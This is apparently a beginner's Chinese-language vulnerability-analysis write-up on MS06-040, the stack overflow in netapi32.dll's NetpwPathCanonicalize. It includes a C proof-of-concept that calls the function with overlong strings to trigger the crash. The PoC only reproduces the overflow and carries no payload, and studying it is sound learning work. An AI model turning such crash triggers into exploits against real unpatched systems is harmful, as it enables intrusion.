最近开始学习漏洞分析相关内容,完成对Windows相关安全机制的学习后,便是寻找实例进行练习,这MS06-040是一个经典的栈溢出漏洞,原理很好理解,在此分享一下自己的分析过程,希望对同样是漏洞分析新手的同学有所帮助
漏洞存在于netapi32.dll中的导出函数NetpwPathCanonicalize()里,原型为:
int NetpwPathCanonicalize (
uint16 path[ ], // [in] path name
uint8 can_path[ ], // [out] canonicalized path
uint32 maxbuf, // [in] max size of can_path
uint16 prefix[ ], // [in] path prefix
uint32* pathtype, // [in out] path type
uint32 pathflags // [in] path flags, 0 or 1
);
功能是将perfix和path用\
字符拼接,输出到can_path中,输出字符串的容量是maxbuf这么大
漏洞触发的POC如下:
#include <windows.h>
typedef void (*MYPROC)(LPTSTR, LPTSTR, int, LPTSTR, long *, long);
int main() {
char path[0x320];
char can_path[0x440];
int maxbuf = 0x440;
char prefix[0x100];
long pathtype = 44;
HINSTANCE LibHandle;
MYPROC Trigger;
char dll[] = "./netapi32.dll";
char VulFunc[] = "NetpwPathCanonicalize";
LibHandle = LoadLibrary(dll);
Trigger = (MYPROC)GetProcAddress(LibHandle, VulFunc);
memset(path, 0, sizeof(path));
memset(path, 'a', sizeof(path) - 2);
memset(prefix, 0, sizeof(prefix));
memset(prefix, 'b', sizeof(prefix) - 2);
(Trigger)(path, can_path, maxbuf, prefix, &pathtype, 0);
FreeLibrary(LibHandle);
return 0;
}
代码是装在存在漏洞的netapi32.dll来调用漏洞函数进行复现漏洞
这里将path和prefix设置成长字符串来触发栈溢出,编译运行直到异常:
发现执行到NetpwPathCanonicalize里的这个函数的时候,触发了异常